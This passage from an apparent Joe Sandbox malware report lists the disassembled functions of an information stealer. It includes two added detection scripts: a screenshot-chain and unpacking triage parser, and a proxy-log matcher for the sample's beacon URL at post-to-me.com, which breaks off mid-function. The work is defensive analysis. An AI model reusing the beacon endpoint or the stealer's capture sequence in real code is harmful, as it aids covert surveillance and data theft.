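Two things in the function entries above are worth pulling out mechanically rather than by eye. The GDI+ entry at 00402086 is the standard screenshot-to-disk sequence (GdiplusStartup, GdipCreateBitmapFromHBITMAP on a captured HBITMAP, GdipSaveImageToFile, GdiplusShutdown), which is the capability the stealer's screen-capture signature rests on. And several entries share one Opcode ID between the PE-backed region at 00400000 (based on PE: true) and the region at 009E0000 (based on PE: false, with Yara matches), e.g. 82de0933... and 709da5f2...: the same function body exists both in the loaded image and in memory the sample mapped itself, which is the kind of evidence behind the "Detected unpacking" signatures in the overview. The script below is an added example, not Joe Sandbox code: it parses these report lines (formats inferred from the text above), flags ordered API chains, and reports Opcode IDs that straddle PE-backed and non-PE-backed regions. The chain label and field names are this script's own; the embedded sample is an excerpt of the entries above, trimmed to the lines the parser reads.

```python
# Triage helper for Joe Sandbox per-function entries. Reads the
# '<api>.<module>(...) ref: <addr>', 'Source File', 'Yara matches' and
# 'Opcode ID' lines; derives capability chains and unpacking evidence.
# Added example, not Joe Sandbox code; line formats inferred from the report.
import re
from collections import defaultdict

API_RE = re.compile(
    r"^(?:\u2022\s*)?(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[\w:~@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})")
SRC_RE = re.compile(r"Source File:\s+(\S+),\s+Offset:\s+([0-9A-F]+),\s+based on PE:\s+(true|false)")
OPCODE_RE = re.compile(r"Opcode ID:\s+([0-9a-f]{64})")
END_RE = re.compile(r"Instruction Fuzzy Hash:\s+[0-9A-F]+")  # last field of every entry

# Ordered API sequences to flag (labels are ours; extend with other chains as needed).
CHAINS = {
    "gdiplus_screenshot_to_file":
        ("GdiplusStartup", "GdipCreateBitmapFromHBITMAP", "GdipSaveImageToFile"),
}


def _new():
    return {"apis": [], "source": None, "offset": None, "pe_backed": None,
            "yara": False, "opcode_id": None}


def parse_entries(text):
    """Split report text into one dict per function entry."""
    entries, cur = [], _new()
    for raw in text.splitlines():
        line = raw.strip()
        if (m := API_RE.match(line)):
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "ref": int(m["ref"], 16), "caller": m["caller"]})
        elif (m := SRC_RE.search(line)):
            cur["source"], cur["offset"] = m[1], int(m[2], 16)
            cur["pe_backed"] = m[3] == "true"
        elif line == "Yara matches":
            cur["yara"] = True
        elif (m := OPCODE_RE.search(line)):
            cur["opcode_id"] = m[1]
        elif END_RE.search(line):
            entries.append(cur)
            cur = _new()
    return entries


def find_chains(entry):
    """Chain labels whose APIs occur, in address order, as direct calls of this
    function; 'Part of subcall' lines are skipped because they belong to the callee."""
    names = [a["name"] for a in sorted(entry["apis"], key=lambda a: a["ref"])
             if a["caller"] is None]
    hits = []
    for label, seq in CHAINS.items():
        it = iter(names)  # ordered-subsequence test: each wanted API must follow the previous
        if all(any(n == want for n in it) for want in seq):
            hits.append(label)
    return hits


def unpacking_evidence(entries):
    """Opcode IDs shared by a PE-backed and a non-PE-backed region: the same
    function body sits in the loaded image and in memory the sample mapped itself."""
    by_id = defaultdict(list)
    for e in entries:
        if e["opcode_id"] and e["pe_backed"] is not None:
            by_id[e["opcode_id"]].append(e)
    return {oid: sorted(e["offset"] for e in es) for oid, es in by_id.items()
            if {e["pe_backed"] for e in es} == {True, False}}


# Excerpt of the report entries above, trimmed to the lines this script reads;
# the addresses and hashes are the report's own.
SAMPLE = """
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
• GdipAlloc.GDIPLUS(00000010), ref: 0040208E
• GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
• GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
• GdiplusShutdown.GDIPLUS(?), ref: 004020FF
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
• Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
• Concurrency::critical_section::unlock.LIBCMT ref: 00411EBC
  • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411153
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
• Instruction Fuzzy Hash: E8E0D8355005029BCB04FF21C5614DCFB617F44354B10825EE466432E1CF785D86CB88
• Concurrency::critical_section::unlock.LIBCMT ref: 009F2123
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Yara matches
• Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
• Instruction Fuzzy Hash: 57E04F3560051E9BCB08FB64C8617BCFB61BFC5310B544249A565472E2CF746E46DBC5
"""

if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for e in ents:
        for label in find_chains(e):
            print(f"{e['apis'][0]['ref']:08X}: {label}")
    for oid, offs in unpacking_evidence(ents).items():
        print(f"unpacking evidence: opcode {oid[:12]} at {[hex(o) for o in offs]}")
```

Run over the full report text instead of the excerpt, the same two calls give a list of every function that carries a flagged chain and every Opcode ID duplicated across the image and an unbacked region; adding a chain for the clipboard or process-enumeration APIs listed in the overview is a one-line change to CHAINS.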
                                                                                    APIs
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E50C8
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E50DC
                                                                                      • Part of subcall function 009EBDD3: __EH_prolog3_GS.LIBCMT ref: 009EBDDA
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E5141
                                                                                    • __Getcoll.LIBCPMT ref: 009E5150
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E5160
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                    • String ID:
                                                                                    • API String ID: 1844465188-0
                                                                                    • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                                                    • Instruction ID: 260a0715103ba0388b67b4daceeeef547125e005e6a3f54f4ff4ae9bb31ba0db
                                                                                    • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                                                    • Instruction Fuzzy Hash: 1221C2B1804348EFDB02EFA1C841BDDBBB4FF80311F408419E095AB282DBB49E45CB91
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                                                    • _free.LIBCMT ref: 00431FB8
                                                                                    • _free.LIBCMT ref: 00431FDF
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                    • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                                                    • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                    • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(009EDAFC,009EDAFC,00000002,00A0ED55,00A13971,00000000,?,00A06A25,00000002,00000000,00000000,00000000,?,009ECFAD,009EDAFC,00000004), ref: 00A121EA
                                                                                    • _free.LIBCMT ref: 00A1221F
                                                                                    • _free.LIBCMT ref: 00A12246
                                                                                    • SetLastError.KERNEL32(00000000,?,009EDAFC), ref: 00A12253
                                                                                    • SetLastError.KERNEL32(00000000,?,009EDAFC), ref: 00A1225C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                    • Instruction ID: 2ffc24a5d2636de54913d036eaebd7f0b476648f96da71cd8503c3a41b757217
                                                                                    • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                    • Instruction Fuzzy Hash: 6D01F936505B007B861627345D86FEF226DEFD6BB2B200538F51593292FE70CDA28229
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • _free.LIBCMT ref: 00431F31
                                                                                    • _free.LIBCMT ref: 00431F59
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                    • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                                                    • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                    • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                    • _free.LIBCMT ref: 00A12198
                                                                                    • _free.LIBCMT ref: 00A121C0
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121CD
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                    • Instruction ID: 3737075b4cafc427696373345e1fcc387726733bde453276a83227db2e16c274
                                                                                    • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                    • Instruction Fuzzy Hash: CCF0CD36544B00B7C6117734AD0ABDF26699FC2BA2F250624FE28D72D1EE61C9E24329
                                                                                    APIs
                                                                                      • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                                                      • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                    • String ID:
                                                                                    • API String ID: 4266703842-0
                                                                                    • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                                                    • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                                                    APIs
                                                                                      • Part of subcall function 009F29C4: TlsGetValue.KERNEL32(?,?,009F0DE2,009F2EEF,00000000,?,009F0DC0,?,?,?,00000000,?,00000000), ref: 009F29CA
                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 009F7BD1
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00A01261
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00A0127A
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A012F0
                                                                                      • Part of subcall function 00A0123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A012F8
                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 009F7BDF
                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 009F7BE9
                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 009F7BF3
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F7C11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                    • String ID:
                                                                                    • API String ID: 4266703842-0
                                                                                    • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction ID: b60f9e6044826ab390dde52f5b5a097f04c35fdf3e001897d622d6d072f9840b
                                                                                    • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                    • Instruction Fuzzy Hash: B6F02B35A0011C67CF16F775D812B7EF72A9FC1710B05412AF64193282DF759E4687C5
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00439E7D
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 00439E8F
                                                                                    • _free.LIBCMT ref: 00439EA1
                                                                                    • _free.LIBCMT ref: 00439EB3
                                                                                    • _free.LIBCMT ref: 00439EC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00A1A0E4
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A1A0F6
                                                                                    • _free.LIBCMT ref: 00A1A108
                                                                                    • _free.LIBCMT ref: 00A1A11A
                                                                                    • _free.LIBCMT ref: 00A1A12C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction ID: 7e3976c7b333a0b02ed6d410f25bb59ddf828532437b20ba9abdc3af23596686
                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                    • Instruction Fuzzy Hash: 23F04F33506200BB8A20EF58E9C3C9A73DDAA153A1B640E05F018DB711CF31FCD08A5A
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00431768
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 0043177A
                                                                                    • _free.LIBCMT ref: 0043178D
                                                                                    • _free.LIBCMT ref: 0043179E
                                                                                    • _free.LIBCMT ref: 004317AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                                                    APIs
                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                                                    • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                    • String ID:
                                                                                    • API String ID: 2583373041-0
                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00A119CF
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A119E1
                                                                                    • _free.LIBCMT ref: 00A119F4
                                                                                    • _free.LIBCMT ref: 00A11A05
                                                                                    • _free.LIBCMT ref: 00A11A16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction ID: 2cd1686f3f36f4323c875228628474037464e34c00b50b7d69f1795a295f85b7
                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                    • Instruction Fuzzy Hash: 7EF03071C00311AB8E216F14AD924493B64AF1A7627000666F4229B373CB74D9E2DB8E
                                                                                    APIs
                                                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 009FCF56
                                                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 009FCF87
                                                                                    • GetCurrentThread.KERNEL32 ref: 009FCF90
                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 009FCFA3
                                                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 009FCFAC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                    • String ID:
                                                                                    • API String ID: 2583373041-0
                                                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction ID: 42164d66af501640ed6bf8d949e0b4b8f8dbbe7e22a790f12105f0c4fe6c69c2
                                                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                    • Instruction Fuzzy Hash: 27F0A0362009089B8A25EF61FA50DBBB7BBAFC4711310854CF68706652CF25AA42EB31
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 009E2EAE
                                                                                      • Part of subcall function 009E1321: _wcslen.LIBCMT ref: 009E1328
                                                                                      • Part of subcall function 009E1321: _wcslen.LIBCMT ref: 009E1344
                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009E30C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InternetOpen_wcslen
                                                                                    • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                    • API String ID: 3381584094-4083784958
                                                                                    • Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                                                    • Instruction ID: 372b866b8966085bdf93468711da0ca021e4fa75951f2537d9e5a777c14a08ce
                                                                                    • Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                                                    • Instruction Fuzzy Hash: 3A518395A65344A8E320EFB0BC52B353378EF58752F10643BE518CB2B2E7B18E40875E
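The function above is the one network callout in this listing: it opens a WinINet session with InternetOpenW and fetches a URL with InternetOpenUrlW, and its string table carries the two fragments "https://post-to-me.com/track_prt.php?sub=" and "&cc=DE". The "&cc=DE" suffix is a literal in the function, so as far as this listing shows the country code is hard-coded in this build rather than computed at run time; only the sub value is filled in. The following detection check is an added example, not code from the Joe Sandbox report or from the sample: it rebuilds the URL shape implied by those fragments and matches it against constructed proxy log lines. The sub values and the log line format are assumptions made for illustration.

```python
"""Match the WinINet beacon URL seen in the function listing against proxy logs.

Added example; not part of the Joe Sandbox report or the analysed sample.
Grounded in the report: the string fragments
"https://post-to-me.com/track_prt.php?sub=" and "&cc=DE".
Assumed for illustration: the sub values and the proxy log line format.
"""
import re
from urllib.parse import parse_qs, urlsplit

BEACON_HOST = "post-to-me.com"
BEACON_PATH = "/track_prt.php"


def build_beacon_url(sub: str, cc: str = "DE") -> str:
    """Reconstruct the URL shape the fragments imply: prefix + sub + "&cc=DE".

    The real sub value is not visible in the listing; the caller supplies one.
    """
    return f"https://{BEACON_HOST}{BEACON_PATH}?sub={sub}&cc={cc}"


def is_beacon_url(url: str):
    """Return (sub, cc) when url matches the beacon pattern, otherwise None.

    Matching is done on parsed host, path and query rather than on a raw
    substring, so a different path on the same host or the same path on
    another host is not reported.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None
    if parts.hostname is None or parts.hostname.lower() != BEACON_HOST:
        return None
    if parts.path != BEACON_PATH:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "sub" not in query or "cc" not in query:
        return None
    return query["sub"][0], query["cc"][0]


# Assumed proxy log format: "<timestamp> <client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def scan_proxy_log(lines):
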